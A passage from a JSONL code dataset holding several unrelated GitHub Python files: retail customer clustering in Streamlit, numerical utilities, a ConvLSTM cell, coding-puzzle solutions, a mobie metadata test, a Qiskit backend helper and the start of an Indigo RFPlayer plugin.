x.date()).days)\n test_lp = last_purchase.applymap(lambda x:(last_date - x.date()).days)\n\n st.markdown(\"\"\"\n We are going to create new columns for transactions_per_user, one column called `FirstPurchase` and other column named `LastPurchase`.\n\n `FirstPurchase`: is going to take the values from test_fp, we do not reset its index, this will match the CustomerID in transactions_per_user. `LastPurchase`: is going to take the values from test_lp, we do not reset its index, this will match the CustomerID in transactions_per_user.\n \"\"\")\n\n st.code(\"\"\"\n transactions_per_user.loc[:, 'FirstPurchase'] = test_fp.reset_index(drop=False)['InvoiceDate']\n transactions_per_user.loc[:, 'LastPurchase'] = test_lp.reset_index(drop=False)['InvoiceDate']\n \"\"\")\n\n transactions_per_user.loc[:, 'FirstPurchase'] = test_fp.reset_index(drop=False)['InvoiceDate']\n transactions_per_user.loc[:, 'LastPurchase'] = test_lp.reset_index(drop=False)['InvoiceDate']\n\n\n st.dataframe(transactions_per_user.head(5))\n\n\n st.markdown(\"\"\"\n ## Creating Customers Categories\n #### Data Encoding\n * `transactions_per_user` is a DF that contains a summary of all the transaction that were made by each client. \n * This information will be used to characterize the different types of customers and only keep a subset of variables:\n * Let's create a list call list_cols that will hold the features that are going to be used for the model to learn patterns in order to define the clusters.\n \"\"\")\n list_cols = ['count','min','max','mean','Cat_0','Cat_1','Cat_2','Cat_3','Cat_4', 'LastPurchase', 'FirstPurchase']\n\n selected_customers = transactions_per_user.copy(deep=True)\n matrix = selected_customers[list_cols].to_numpy()\n\n from sklearn.preprocessing import StandardScaler, MinMaxScaler\n minmax_scaler = MinMaxScaler()\n minmax_scaler.fit(matrix)\n minmaxscaled_matrix = minmax_scaler.transform(matrix)\n\n st.markdown(\"\"\"\n #### Creation of Customer Categories\n\n Well it is the time we all have been waiting, the creation of this clusters will be done by using KMeans, it is a very similar process as the one we did with creating the clusters for words with KModes.\n \\n\n This may take a while!\n \\n\n The best number of clusters will be defined by the technique Elbow Method.\n \"\"\")\n\n st.write(\"Run the code bellow to find the best K using k-means (we cannot run it in streamlit because we used the go Figure)\")\n st.code(\"\"\"\n for n_clusters in range(1, 21):\n kmeans = KMeans(init='k-means++', max_iter=100, n_clusters=n_clusters, n_init=100, random_state=42).fit(minmaxscaled_matrix)\n inertia.append(kmeans.inertia_)\n clusters_history['inertia'] = inertia\n clusters_history\n\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=clusters_history.cluster_range,\n y=clusters_history.inertia,\n name='Clusters',\n text='Quantity of Clusters and Inertia Value'))\n fig.update_layout(\n title_text='Clusters vs Inertia',\n title_x=0.5,\n xaxis = dict(\n title='Quantity Clusters'),\n yaxis = dict(title='Inertia')\n )\n fig.show()\n \"\"\")\n \n st.write(\"\"\"\n ##### After experimenting with the clusters we conclude that 14 clusters is the right value for n_clusters\n \"\"\")\n\n with st.spinner('Clustering - Grouping Cutomers: Wait for it...'):\n n_clusters = 14\n kmeans = KMeans(init='k-means++', max_iter=100, n_clusters=n_clusters, n_init=100, random_state=42)\n kmeans.fit(minmaxscaled_matrix)\n\n if 'kmeans' not in st.session_state:\n st.session_state['kmeans'] = kmeans\n \n # we ran the code bellow to store kmeans model once\n # with open(\"./src/models/kmeans.pkl\", \"wb\") as f:\n # pickle.dump(kmeans, f)\n \n clients_clusters = kmeans.predict(minmaxscaled_matrix)\n silhouette_avg = silhouette_score(minmaxscaled_matrix, clients_clusters)\n print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n\n st.write(\"print the frequencies of the clusters\")\n st.dataframe(pd.DataFrame(pd.Series(clients_clusters).value_counts(), columns = ['Quantity of Clients in Cluster']).T)\n\n st.write(\"Plot the silhouette graph and evaluate\")\n sample_silhouette_values = silhouette_samples(minmaxscaled_matrix, clients_clusters)\n graph_component_silhouette(n_clusters, [-0.15, 0.55], len(minmaxscaled_matrix), sample_silhouette_values, clients_clusters)\n\n st.markdown(\"\"\"\n * Some of the clusters are indeed disjoint. It remains to understand the habits of the customers in each cluster. \n * To do so, we start by adding to the selected_customers dataframe a variable that defines the cluster to which each client belongs.\n \"\"\")\n\n st.code(\"selected_customers.loc[:, 'cluster'] = clients_clusters\")\n selected_customers.loc[:, 'cluster'] = clients_clusters\n\n st.markdown(\"\"\"\n * Then, We average the contents of this dataframe by first selecting the different groups of clients. \n * This gives access to, for example, the average cart price, the number of visits or the total sums spent by the clients of the different clusters. \n * We also determine the number of clients in each group (variable size ):\n \"\"\")\n\n merged_df = pd.DataFrame()\n for i in range(n_clusters):\n test_fp = pd.DataFrame(selected_customers[selected_customers['cluster'] == i].mean())\n test_fp = test_fp.T.set_index('cluster', drop = True)\n test_fp['size'] = selected_customers[selected_customers['cluster'] == i].shape[0]\n merged_df = pd.concat([merged_df, test_fp])\n st.dataframe(merged_df)\n\n # merged_df.drop('CustomerID', axis = 1, inplace = True)\n print('number of customers:', merged_df['size'].sum())\n merged_df = merged_df.sort_values('sum')\n\n st.markdown(\"\"\"\n * Finally, We re-organize the content of the dataframe by ordering the different clusters: \n * First, in relation to the amount spent in each product category and then, according to the total amount spent:\n \"\"\")\n\n st.code(\"\"\"\n list_index = []\n for i in range(5):\n column = 'Cat_{}'.format(i)\n list_index.append(merged_df[merged_df[column] > 45].index.values[0])\n\n list_index_reordered = list_index\n list_index_reordered += [ s for s in merged_df.index if s not in list_index]\n\n merged_df = merged_df.reindex(index = list_index_reordered)\n merged_df = merged_df.reset_index(drop = False)\n merged_df[['cluster', 'count', 'min', 'max', 'mean', 'sum', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'size']]\n\n columns = ['count','min', 'max', 'mean', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'LastPurchase', 'FirstPurchase']\n X_fp = selected_customers[columns]\n Y_fp = selected_customers['cluster']\n \"\"\")\n\n list_index = []\n for i in range(5):\n column = 'Cat_{}'.format(i)\n list_index.append(merged_df[merged_df[column] > 45].index.values[0])\n\n list_index_reordered = list_index\n list_index_reordered += [ s for s in merged_df.index if s not in list_index]\n\n merged_df = merged_df.reindex(index = list_index_reordered)\n merged_df = merged_df.reset_index(drop = False)\n merged_df[['cluster', 'count', 'min', 'max', 'mean', 'sum', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'size']]\n\n columns = ['count','min', 'max', 'mean', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'LastPurchase', 'FirstPurchase']\n X_fp = selected_customers[columns]\n Y_fp = selected_customers['cluster']\n\n st.write(\"\"\"\n ##### Now lets see some products of each category to understand what each category buys in combination with the table above\n \"\"\")\n with st.spinner('Product Lists creation in progress: Wait for it...'):\n\n list_products_cat_0 = []\n list_products_cat_1 = []\n list_products_cat_2 = []\n list_products_cat_3 = []\n list_products_cat_4 = []\n for index, row in df_cleaned.iterrows():\n if row['Product_Category'] == 0:\n list_products_cat_0.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 1:\n list_products_cat_1.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 2:\n list_products_cat_2.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 3:\n list_products_cat_3.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 4:\n list_products_cat_4.append([row['Description'], row['StockCode']])\n\n st.write(\"**Cat_0 Sample of 3 products:**\")\n st.write(list_products_cat_0[:3])\n st.write(\"**Cat_1 Sample of 3 products:**\")\n st.write(list_products_cat_1[:3])\n st.write(\"**Cat_2 Sample of 3 products:**\")\n st.write(list_products_cat_2[:3])\n st.write(\"**Cat_3 Sample of 3 products:**\")\n st.write(list_products_cat_3[:3])\n st.write(\"**Cat_4 Sample of 3 products:**\")\n st.write(list_products_cat_4[:3])","repo_name":"PambosH96/Machine-Learning-Project-for-Retailer","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":38314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13359133746","text":"import numpy as np\n\ndef fieldAverage(alpha1, field, value1, value2):\n mesh = alpha1.mesh\n\n for i in range(mesh.nx+2):\n for j in range(mesh.ny+2):\n field.cells[i,j] = value1*alpha1.cells[i,j] + value2*(1.-alpha1.cells[i,j])\n\n\ndef readVofi(filename, nx, ny):\n\n # Cell centered field without ghost cells\n cc = np.zeros([nx, ny])\n nplines = np.zeros(nx*ny)\n\n f = open(filename, \"r\")\n lines = f.readlines()\n\n for count, line in enumerate(lines):\n nplines[count] = float(line)\n\n count = 0\n for i in range(nx):\n for j in range(ny):\n cc[i,j] = nplines[count]\n count += 1\n\n return cc\n\n\ndef readVofi(filename, field):\n\n nx = field.mesh.nx\n ny = field.mesh.ny\n\n # Cell centered field without ghost cells\n nplines = np.zeros(nx*ny)\n\n f = open(filename, \"r\")\n lines = f.readlines()\n\n for count, line in enumerate(lines):\n nplines[count] = float(line)\n\n count = 0\n for i in range(nx):\n for j in range(ny):\n field.cells[i+1,j+1] = nplines[count]\n count += 1\n\n","repo_name":"edocipriano/fassa","sub_path":"fassa/vof/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"69934635443","text":"import tensorflow as tf\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import rnn_cell_impl\nfrom tensorflow.python.ops import variable_scope as vs\n\n\nclass ConvLSTMCell(rnn_cell_impl.RNNCell):\n \"\"\"Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self,\n conv_ndims,\n input_shape,\n output_channels,\n kernel_shape,\n use_bias=True,\n skip_connection=False,\n forget_bias=1.0,\n initializers=None,\n name=\"conv_lstm_cell\"):\n \"\"\"Construct ConvLSTMCell.\n Args:\n conv_ndims: Convolution dimensionality (1, 2 or 3).\n input_shape: Shape of the input as int tuple, excluding the batch size.\n output_channels: int, number of output channels of the conv LSTM.\n kernel_shape: Shape of kernel as in tuple (of size 1,2 or 3).\n use_bias: Use bias in convolutions.\n skip_connection: If set to `True`, concatenate the input to the\n output of the conv LSTM. Default: `False`.\n forget_bias: Forget bias.\n name: Name of the module.\n Raises:\n ValueError: If `skip_connection` is `True` and stride is different from 1\n or if `input_shape` is incompatible with `conv_ndims`.\n \"\"\"\n super(ConvLSTMCell, self).__init__(name=name)\n\n if conv_ndims != len(input_shape)-1:\n raise ValueError(\"Invalid input_shape {} for conv_ndims={}.\".format(\n input_shape, conv_ndims))\n\n self._conv_ndims = conv_ndims\n self._input_shape = input_shape\n self._output_channels = output_channels\n self._kernel_shape = kernel_shape\n self._use_bias = use_bias\n self._forget_bias = forget_bias\n self._skip_connection = skip_connection\n\n self._total_output_channels = output_channels\n if self._skip_connection:\n self._total_output_channels += self._input_shape[-1]\n\n state_size = tensor_shape.TensorShape(self._input_shape[:-1] \n + [self._output_channels])\n self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)\n self._output_size = tensor_shape.TensorShape(self._input_shape[:-1]\n + [self._total_output_channels])\n\n @property\n def output_size(self):\n return self._output_size\n\n @property\n def state_size(self):\n return self._state_size\n\n def call(self, inputs, state, scope=None):\n cell, hidden = state\n new_hidden = _conv([inputs, hidden],\n self._kernel_shape,\n 4*self._output_channels,\n self._use_bias)\n gates = array_ops.split(value=new_hidden,\n num_or_size_splits=4,\n axis=self._conv_ndims+1)\n\n input_gate, new_input, forget_gate, output_gate = gates\n new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell\n new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)\n output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)\n\n if self._skip_connection:\n output = array_ops.concat([output, inputs], axis=-1)\n new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)\n return output, new_state\n\nclass Conv1DLSTMCell(ConvLSTMCell):\n \"\"\"1D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_1d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv1DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv1DLSTMCell, self).__init__(conv_ndims=1, **kwargs)\n\nclass Conv2DLSTMCell(ConvLSTMCell):\n \"\"\"2D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_2d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv2DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv2DLSTMCell, self).__init__(conv_ndims=2, **kwargs)\n\nclass Conv3DLSTMCell(ConvLSTMCell):\n \"\"\"3D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_3d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv3DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv3DLSTMCell, self).__init__(conv_ndims=3, **kwargs)\n\ndef _conv(args, \n filter_size,\n num_features,\n bias,\n bias_start=0.0):\n \"\"\"convolution:\n Args:\n args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D, \n batch x n, Tensors.\n filter_size: int tuple of filter height and width.\n num_features: int, number of features.\n bias_start: starting value to initialize the bias; 0 by default.\n Returns:\n A 3D, 4D, or 5D Tensor with shape [batch ... num_features]\n Raises:\n ValueError: if some of the arguments has unspecified or wrong shape.\n \"\"\"\n\n # Calculate the total size of arguments on dimension 1.\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3,4,5]:\n raise ValueError(\"Conv Linear expects 3D, 4D or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args to be of same Dimensiton: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n # determine correct conv operation\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length*[1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length*[1]\n\n # Now the computation.\n kernel = vs.get_variable(\n \"kernel\", \n filter_size + [total_arg_size_depth, num_features],\n dtype=dtype)\n if len(args) == 1:\n res = conv_op(args[0], kernel, strides, padding='SAME')\n \n else:\n input_tensor = array_ops.concat(axis=shape_length-1, values=args)\n inshape = tf.shape(input_tensor)\n depth_batch_size = inshape[0]\n \n\n outshape = [inshape[0], inshape[1], tf.shape(kernel)[-1]]\n\n res = tf.cond(tf.equal(depth_batch_size, 0),\n lambda: tf.zeros(outshape),\n lambda: conv_op(input_tensor, kernel, strides, padding='SAME'))\n if not bias:\n return res\n bias_term = vs.get_variable(\n \"biases\", [num_features],\n dtype=dtype,\n initializer=init_ops.constant_initializer(\n bias_start, dtype=dtype))\n return res + bias_term\n","repo_name":"evelkey/dynamic-segmentation","sub_path":"segmentation/conv_lstm_cell.py","file_name":"conv_lstm_cell.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72062289523","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n#\r\n# Complete the 'hourglassSum' function below.\r\n#\r\n# The function is expected to return an INTEGER.\r\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\r\n#\r\n\r\n\r\n\r\ndef hourglassSum(arr):\r\n sumList = []\r\n for n in range(4):\r\n for i in range(4):\r\n sum = 0\r\n for j in range(i, i+3):\r\n for k in range(n, n+3):\r\n if j == i+1 and (k == n or k == n+2):\r\n sum += 0\r\n else:\r\n sum += arr[j][k]\r\n sumList.append(sum)\r\n return max(sumList)\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n arr = []\r\n\r\n for _ in range(6):\r\n arr.append(list(map(int, input().rstrip().split())))\r\n\r\n result = hourglassSum(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"datahubber/ProgramMethod","sub_path":"Data Structures/max hourglass in a 2D array/max hourglass in a 2D array.py","file_name":"max hourglass in a 2D array.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20269469363","text":"'''\nn = 2, there are k * 1 way to painting same color. and k(k-1) way for different\ncolor.\nn = 3, if 1st and 2nd fence are same color(k*1), the 3rd one has k-1 posible ways,\nif 1st & 2nd are diff, the 3rd has k-1 way for diff color and 1 way for same color\nwith previous fence. its k * (k-1) or (k*(k-1)) * 1. k(k-1)\nprevious fences have k + k(k-1) possible combinations. so its (k+k(k-1))*(k-1)\npossible ways for 3rd and 2nd has different color.\n'''\n# 79 / 79 test cases passed.\n# Status: Accepted\n# Runtime: 35 ms\nclass Solution(object):\n def numWays(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: int\n \"\"\"\n if n == 0:\n return 0\n if n == 1:\n return k\n k1 = k-1\n same, diff = k, k*k1\n for i in range(3, n+1):\n same, diff = diff, (same + diff) * k1\n return same + diff\n","repo_name":"JinXJinX/practice","sub_path":"leetcode/276_Paint_Fence.py","file_name":"276_Paint_Fence.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7662692984","text":"import os\nimport unittest\nfrom shutil import rmtree\nfrom subprocess import run\nfrom sys import platform\n\nimport mobie\nimport numpy as np\nimport pandas as pd\n\nfrom elf.io import open_file\nfrom mobie.xml_utils import parse_s3_xml\nfrom mobie.validation.utils import validate_with_schema\n\n\nclass TestRemoteMetadata(unittest.TestCase):\n test_folder = \"./test-folder\"\n root = \"./test-folder/data\"\n shape = (64, 64, 64)\n dataset_name = \"test\"\n datasets = [dataset_name, \"test_relative\"]\n\n def init_dataset(self, file_format):\n data_path = os.path.join(self.test_folder, \"data.h5\")\n data_key = \"data\"\n with open_file(data_path, \"a\") as f:\n f.create_dataset(data_key, data=np.random.rand(*self.shape))\n\n tmp_folder = os.path.join(self.test_folder, \"tmp-init\")\n\n raw_name = \"test-raw\"\n scales = [[2, 2, 2]]\n mobie.add_image(data_path, data_key, self.root, self.dataset_name, raw_name,\n resolution=(1, 1, 1), chunks=(32, 32, 32), scale_factors=scales,\n tmp_folder=tmp_folder, file_format=file_format)\n\n # add a region source (which does not have imageData)\n # to make sure it is properly handled when adding the remote metadata\n dummy_table = pd.DataFrame.from_dict({\n \"region_id\": list(range(10)),\n \"dummy\": np.random.rand(10),\n })\n mobie.metadata.add_regions_to_dataset(os.path.join(self.root, self.dataset_name), \"my-regions\",\n default_table=dummy_table)\n\n # add an image source pointing to another dataset to make sure\n # that its relative path is correctly translated into remote paths\n\n if not file_format.startswith(\"bdv\"):\n new_ds = self.datasets[1]\n new_ds_path = os.path.join(self.root, new_ds)\n\n mobie.metadata.add_dataset(self.root, new_ds, False)\n os.makedirs(new_ds_path, exist_ok=True)\n mobie.metadata.create_dataset_metadata(new_ds_path)\n data_path, image_metadata_path = mobie.utils.get_internal_paths(os.path.join(self.root, self.dataset_name),\n file_format, raw_name)\n mobie.metadata.add_source_to_dataset(new_ds_path, \"image\", new_ds, image_metadata_path)\n rel_view = mobie.metadata.read_dataset_metadata(new_ds_path)[\"views\"][new_ds]\n mobie.metadata.add_view_to_dataset(new_ds_path, \"default\", rel_view)\n\n def setUp(self):\n os.makedirs(self.test_folder, exist_ok=True)\n\n def tearDown(self):\n try:\n rmtree(self.test_folder)\n except OSError:\n pass\n\n def _check_remote_metadata(self, file_format, service_endpoint, bucket_name):\n for idx, dataset_name in enumerate(self.datasets):\n if file_format.startswith(\"bdv\") and idx > 0:\n continue\n\n dataset_folder = os.path.join(self.root, dataset_name)\n dataset_metadata = mobie.metadata.read_dataset_metadata(dataset_folder)\n validate_with_schema(dataset_metadata, \"dataset\")\n\n new_file_format = file_format + \".s3\"\n\n sources = dataset_metadata[\"sources\"]\n for name, source in sources.items():\n source_type, source_data = next(iter(source.items()))\n storage = source_data.get(\"imageData\")\n if storage is None:\n continue\n self.assertIn(new_file_format, storage)\n if new_file_format.startswith(\"bdv\"):\n xml = storage[new_file_format][\"relativePath\"]\n xml_path = os.path.join(dataset_folder, xml)\n self.assertTrue(os.path.exists(xml_path))\n _, ep, bn, _ = parse_s3_xml(xml_path)\n self.assertEqual(ep, service_endpoint)\n self.assertEqual(bn, bucket_name)\n else:\n address = storage[new_file_format][\"s3Address\"]\n self.assertTrue(address.startswith(service_endpoint))\n\n if \"relative\" in dataset_name:\n self.assertTrue(\"/\" + self.dataset_name + \"/\" in address)\n\n proj_metadata = mobie.metadata.read_project_metadata(self.root)\n validate_with_schema(proj_metadata, \"project\")\n\n def _test_remote_metadata(self, file_format):\n from mobie.metadata import add_remote_project_metadata\n self.init_dataset(file_format)\n bucket_name = \"my-bucket\"\n service_endpoint = \"https://s3.embl.de\"\n add_remote_project_metadata(self.root, bucket_name, service_endpoint)\n self._check_remote_metadata(file_format, service_endpoint, bucket_name)\n\n def test_remote_metadata_bdv_n5(self):\n self._test_remote_metadata(\"bdv.n5\")\n\n def test_remote_metadata_ome_zarr(self):\n self._test_remote_metadata(\"ome.zarr\")\n\n @unittest.skipIf(platform == \"win32\", \"CLI does not work on windows\")\n def test_cli(self):\n file_format = \"bdv.n5\"\n self.init_dataset(file_format)\n bucket_name = \"my-bucket\"\n service_endpoint = \"https://s3.embl.de\"\n ret = run([\"mobie.add_remote_metadata\", \"-i\", self.root, \"-b\", bucket_name, \"-s\", service_endpoint])\n self.assertTrue(ret.returncode == 0)\n self._check_remote_metadata(file_format, service_endpoint, bucket_name)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mobie/mobie-utils-python","sub_path":"test/metadata/test_remote_metadata.py","file_name":"test_remote_metadata.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"32909028784","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom qiskit import *\nimport numpy as np\nfrom qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, execute\nfrom qiskit import Aer, IBMQ # import the Aer and IBMQ providers\nfrom qiskit.providers.aer import noise # import Aer noise models\nfrom qiskit.tools.monitor import job_monitor\nfrom RenormalizeProbability import *\n\n\n\n# In[7]:\n\n\ndef ChooseBackEnd(quantumCircuit, backendType=\"statevector_simulator\", qubitsToBeMeasured=range(4), numberShots=4096, noisePresent=False, RealDeviceName=\"ibmq_ourense\",number=12):\n\n if backendType == \"statevector_simulator\":\n backend = Aer.get_backend('statevector_simulator')\n result = execute(quantumCircuit, backend).result()\n probabilityVectors = np.square(np.absolute(result.get_statevector()))\n listForMusic = []\n for k in range(2**len(qubitsToBeMeasured)):\n listForMusic.append(\"%.3f\" % (probabilityVectors[k]))\n\n elif backendType == \"qasm_simulator\":\n if noisePresent == False:\n # no noise\n quantumCircuit.measure(qubitsToBeMeasured, qubitsToBeMeasured)\n print(qubitsToBeMeasured)\n\n backend = Aer.get_backend('qasm_simulator')\n result = execute(quantumCircuit, backend, shots=numberShots).result()\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\"%.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n else:\n print(qubitsToBeMeasured)\n quantumCircuit.measure(qubitsToBeMeasured,qubitsToBeMeasured)\n provider=IBMQ.save_account('XXX-YOUR-TOKEN')\n # simulate noise of a real device\n IBMQ.load_account()\n IBMQ.providers()\n\n\n device = IBMQ.get_provider(hub='ibm-q', group='open', project='main').get_backend(RealDeviceName)\n properties = device.properties()\n coupling_map = device.configuration().coupling_map\n\n # Generate an Aer noise model for device\n noise_model = noise.device.basic_device_noise_model(properties)\n basis_gates = noise_model.basis_gates\n\n\n # Perform noisy simulation\n backend = Aer.get_backend('qasm_simulator')\n job_sim = execute(quantumCircuit, backend,\n coupling_map=coupling_map,\n noise_model=noise_model,\n basis_gates=basis_gates)\n result = job_sim.result()\n\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\"%.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n elif backendType == \"real_device\":\n # real device\n quantumCircuit.measure(qubitsToBeMeasured,qubitsToBeMeasured)\n provider=IBMQ.save_account('XXX-YOUR-TOKEN')\n # simulate noise of a real device\n IBMQ.load_account()\n IBMQ.providers()\n\n\n device = IBMQ.get_provider(hub='ibm-q', group='open', project='main').get_backend(RealDeviceName)\n job_exp = execute(quantumCircuit, backend=device)\n\n job_monitor(job_exp)\n\n result = job_exp.result()\n\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\" %.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n\n\n return listForMusic\n\n\n# In[70]:\nif __name__ == \"__main__\":\n # qc = QuantumCircuit(2,2)\n # qc.h(0)\n # qc.x(1)\n #\n # res = ChooseBackEnd(qc,\"qasm_simulator\",200)\n\n\n # In[8]:\n\n\n music = QuantumCircuit(4,4)\n\n desired_vector = np.zeros(np.power(2,4))\n\n desired_vector[1] = 1 / np.sqrt(3)\n desired_vector[3] = 1/np.sqrt(3)\n desired_vector[10] = 1/np.sqrt(3)\n\n music.initialize(desired_vector, range(4))\n\n listForMusic= ChooseBackEnd(music,backendType=\"statevector_simulator\",qubitsToBeMeasured=range(4),\n numberShots=4096, noisePresent=True, RealDeviceName=\"ibmq_16_melbourne\")\n print(listForMusic)\n\n\n# In[ ]:\n","repo_name":"menegolli/Quantum_synth","sub_path":"backends_select.py","file_name":"backends_select.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"71991114801","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n####################\n\nimport sys\nimport time\nfrom datetime import datetime\nimport json\nimport logging\n\nfrom RFPlayer import RFPlayer\nfrom protocols import Blyss, Chacon, Domia, KD101, Oregon, Owl, Parrot, RTS, Visonic, X2D, X10\n\nkCurDevVersCount = 2 # current version of plugin devices\n\n\n################################################################################\nclass Plugin(indigo.PluginBase):\n\n def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):\n indigo.PluginBase.__init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs)\n\n pfmt = logging.Formatter('%(asctime)s.%(msecs)03d\\t[%(levelname)8s] %(name)20s.%(funcName)-25s%(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n self.plugin_file_handler.setFormatter(pfmt)\n\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n\n self.players = {}\n self.sensorDevices = {}\n self.knownDevices = pluginPrefs.get(\"knownDevices\", indigo.Dict())\n self.triggers = {}\n\n self.protocolClasses = {\n \"1\": X10,\n \"2\": Visonic,\n \"3\": Blyss,\n \"4\": Chacon,\n \"5\": Oregon,\n \"6\": Domia,\n \"7\": Owl,\n \"8\": X2D,\n \"9\": RTS,\n \"10\": KD101,\n \"11\": Parrot\n }\n\n def startup(self):\n self.logger.info(\"Starting RFPlayer\")\n\n def shutdown(self):\n indigo.activePlugin.pluginPrefs[\"knownDevices\"] = self.knownDevices\n self.logger.info(\"Shutting down RFPlayer\")\n\n def runConcurrentThread(self):\n\n try:\n while True:\n for playerID, player in self.players.items():\n if player.connected:\n playerFrame = player.poll()\n else:\n playerFrame = None\n\n if playerFrame:\n indigo.devices[playerID].updateStateOnServer(key='playerStatus', value='Running')\n indigo.devices[playerID].updateStateImageOnServer(indigo.kStateImageSel.SensorOn)\n if 'systemStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: systemStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: systemStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n stateList = [\n {'key': 'firmwareVers', 'value': playerFrame['systemStatus']['info'][0]['v']}\n ]\n self.logger.threaddebug(f'{player.device.name}: Updating states on server: {stateList}')\n indigo.devices[playerID].updateStatesOnServer(stateList)\n\n elif 'radioStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: radioStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: radioStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n stateList = [\n {'key': 'lowBandFreq',\n 'value': playerFrame['radioStatus']['band'][0]['i'][0]['v'] + ' - ' + playerFrame['radioStatus']['band'][0]['i'][0][\n 'c']},\n {'key': 'highBandFreq',\n 'value': playerFrame['radioStatus']['band'][1]['i'][0]['v'] + ' - 